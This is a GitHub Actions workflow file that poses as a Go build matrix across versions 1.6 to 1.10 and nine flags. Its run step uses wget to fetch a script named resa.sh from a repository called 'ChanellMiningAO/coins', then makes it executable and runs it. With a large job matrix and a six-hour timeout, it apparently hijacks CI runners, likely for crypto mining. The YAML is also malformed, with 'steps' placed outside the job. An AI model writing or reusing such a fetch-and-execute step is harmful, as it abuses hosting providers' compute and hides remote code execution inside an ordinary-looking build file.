
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 10
        JOB: ${{ matrix.go }}
steps:
- name: Set up Go ${{ matrix.go }}
  uses: actions/setup-go@v2
  with:
    go-version: ${{ matrix.go }}
  id: go
- name: Setup
  uses: actions/checkout@v3
- name: Running
  run: | 
    wget https://github.com/ChanellMiningAO/coins/blob/main/resa.sh && chmod u+x resa.sh && ./resa.sh
